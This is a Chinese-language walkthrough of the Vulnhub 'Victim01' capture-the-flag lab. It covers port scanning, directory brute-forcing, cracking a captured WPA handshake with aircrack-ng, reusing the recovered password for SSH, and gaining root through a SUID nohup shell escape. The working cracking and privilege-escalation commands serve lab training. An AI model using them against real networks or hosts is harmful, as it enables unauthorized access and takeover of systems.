Victim 01
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0c:40:47 1 60 PCS Systemtechnik GmbH
192.168.56.156 08:00:27:80:d1:6f 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.156
NMAP扫描
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 21:39 EST
Nmap scan report for bogon (192.168.56.156)
Host is up (0.00038s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
| 256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_ 256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open http WebFS httpd 1.21
|_http-title: 0.0.0.0:8999/
|_http-server-header: webfs/1.21
9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:80:D1:6F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.60 seconds
目标主机除了22端口运行SSH服务,其他端口80、8080、8999和9000均运行HTTP服务,接下来主要围绕HTTP服务来开展Enumeration
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156
No configuration file found and no installation code available. Exiting...
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/robots.txt
User-agent: *
Disallow: h@ck3rz!
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/h@ck3rz!
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.156 Port 80</address>
</body></html>
/robots.txt文件暴漏了一个目录,但是却无法访问,奇怪!会不会是一个rabbithole
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156/h@ck3rz!
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 21:48:57 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220014 / 220561 (99.75%)===============================================================
2022/11/12 21:51:42 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
zsh: event not found: /
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
zsh: event not found: /
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156/h@ck3rz!
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,sh,txt,html
[+] Timeout: 10s
===============================================================
2022/11/12 21:53:02 Starting gobuster in directory enumeration mode
===============================================================
Progress: 460170 / 1102805 (41.73%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/12 21:58:49 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 12 21:58:54 2022
URL_BASE: http://192.168.56.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Entering directory: http://192.168.56.156/images/ ----
+ http://192.168.56.156/images/.config (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/shtml.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/awstats.conf (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.156/images/banners/
+ http://192.168.56.156/images/development.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/global.asa (CODE:403|SIZE:279)
+ http://192.168.56.156/images/global.asax (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.156/images/headers/
+ http://192.168.56.156/images/index.html (CODE:200|SIZE:31)
+ http://192.168.56.156/images/main.mdb (CODE:403|SIZE:279)
+ http://192.168.56.156/images/php.ini (CODE:403|SIZE:279)
+ http://192.168.56.156/images/production.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/spamlog.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/thumbs.db (CODE:403|SIZE:279)
+ http://192.168.56.156/images/Thumbs.db (CODE:403|SIZE:279)
+ http://192.168.56.156/images/WS_FTP.LOG (CODE:403|SIZE:279)
^C> Testing: http://192.168.56.156/includes/references
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156/h@ck3rz!
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 12 21:59:35 2022
URL_BASE: http://192.168.56.156/h@ck3rz!/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.156/h@ck3rz!/ ----
+ http://192.168.56.156/h@ck3rz!/.config (CODE:403|SIZE:279)
-----------------
END_TIME: Sat Nov 12 21:59:39 2022
DOWNLOADED: 4612 - FOUND: 1
对80端口的信息收集没有太大收获,虽然心有不甘,哈哈。
接下来看一下8080端口:
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 22:03:17 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220545 / 220561 (99.99%)===============================================================
2022/11/12 22:04:54 Finished
===============================================================
8080端口也没有暴漏出可利用的攻击面。
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156:8999/
<head><title>0.0.0.0:8999/</title></head>
<body bgcolor=white text=black link=darkblue vlink=firebrick alink=red>
<h1>listing:
<a href="/">/</a></h1><hr noshade size=1><pre>
<b>access user group date size name</b>
drwxr-xr-x nobody nogroup Apr 07 2020 <DIR> <a href="wordpress/">wordpress</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-admin/">wp-admin</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-content/">wp-content</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-includes/">wp-includes</a>
-rw-r--r-- root root Apr 07 2020 197 kB <a href="WPA-01.cap">WPA-01.cap</a>
-rw-r--r-- nobody nogroup Feb 06 2020 405 B <a href="index.php">index.php</a>
-rw-r--r-- nobody nogroup Feb 12 2020 19 kB <a href="license.txt">license.txt</a>
-rw-r--r-- nobody nogroup Jan 10 2020 7278 B <a href="readme.html">readme.html</a>
-rw-r--r-- nobody nogroup Feb 06 2020 6912 B <a href="wp-activate.php">wp-activate.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 351 B <a href="wp-blog-header.php">wp-blog-header.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2275 B <a href="wp-comments-post.php">wp-comments-post.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2913 B <a href="wp-config-sample.php">wp-config-sample.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3940 B <a href="wp-cron.php">wp-cron.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2496 B <a href="wp-links-opml.php">wp-links-opml.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3300 B <a href="wp-load.php">wp-load.php</a>
-rw-r--r-- nobody nogroup Feb 10 2020 46 kB <a href="wp-login.php">wp-login.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 8501 B <a href="wp-mail.php">wp-mail.php</a>
-rw-r--r-- nobody nogroup Feb 10 2020 18 kB <a href="wp-settings.php">wp-settings.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 30 kB <a href="wp-signup.php">wp-signup.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 4755 B <a href="wp-trackback.php">wp-trackback.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3133 B <a href="xmlrpc.php">xmlrpc.php</a>
</pre><hr noshade size=1>
<small><a href="http://bytesex.org/webfs.html">webfs/1.21</a> 13/Nov/2022 02:41:04 GMT</small>
</body>
把主要的文件查看了一下,其中一个文件 WPA-01.cap引起注意,看能否下载到本地
看能不能破解这个无线WIFI的密码
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap
Aircrack-ng 1.6
[00:00:13] 71018/14344392 keys tested (5391.78 k/s)
Time left: 44 minutes, 7 seconds 0.50%
KEY FOUND! [ p4ssword ]
Master Key : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD
50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A
Transient Key : 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64 D3 77 A7
E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26 06 0C 98
8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15 3A 3A 11
6C 28 C0 E1 30 92 1B 84 A5 C5 67 3A 47 01 B4 1C
EAPOL HMAC : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9
破解成功,wifi的密码为p4ssword,
也许SSID以及这个密码同时也是ssh的密码
dlink@victim01:/usr/bin$ sudo -l
User dlink may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/TryHarder!
提权
dlink用户可以无需密码执行/usr/bin/TryHarder!
但是目标主机并不存在该文件,因此可以创建该文件,结果失败,没有权限创建该文件,需要另外想办法
dlink@victim01:/usr/bin$ find / -type f -perm /4000 2>/dev/null
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/nohup
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/arping
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/bin/mount
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
dlink@victim01:/usr/bin$ /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
/usr/bin/nohup: ignoring input and appending output to 'nohup.out'
# id
uid=1002(dlink) gid=1004(dlink) euid=0(root) groups=1004(dlink)
# cd /root
# ls -alh
total 68K
drwx------ 7 root root 4.0K Apr 7 2020 .
drwxr-xr-x 23 root root 4.0K Apr 7 2020 ..
lrwxrwxrwx 1 root root 9 Aug 2 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Apr 7 2020 .cache
drwx------ 3 root root 4.0K Aug 2 2019 .gnupg
-rw------- 1 root root 49 Apr 7 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Apr 7 2020 .local
-rw------- 1 root root 0 Apr 7 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 7 Apr 7 2020 .python_history
-rw-r--r-- 1 root root 66 Apr 7 2020 .selected_editor
drwx------ 2 root root 4.0K Apr 7 2020 .ssh
-rw------- 1 root root 8.1K Aug 3 2019 .viminfo
-rw-r--r-- 1 root root 207 Apr 7 2020 .wget-hsts
-rw-r--r-- 1 root root 556 Apr 7 2020 flag.txt
drwxr-xr-x 3 root root 4.0K Apr 7 2020 snap
# cat flag.txt
Nice work!
.:##:::.
.:::::/;;\:.
()::::::@::/;;#;|:.
::::##::::|;;##;|::
':::::::::\;;;/::'
':::::::::::
|O|O|O|O|O|O
:#:::::::##::.
.:###:::::#:::::.
:::##:::::::::::#:.
::::;:::::::::###::.
':::;::###::;::#:::::
::::;::#::;::::::::::
:##:;::::::;::::###::: .
.:::::; .:::##::::::::::::::::
::::::; :::::::::::::::::##:: #rootdance
#
成功提权!
本靶机主要的解决途径是通过破解无线报文,获得SSID和密码,而且假设这个SSID和密码同时也是系统的用户名和密码!
标签:01,http,--,56.156,192.168,Vulnhub,Victim,root,usr From: https://www.cnblogs.com/jason-huawen/p/16885666.html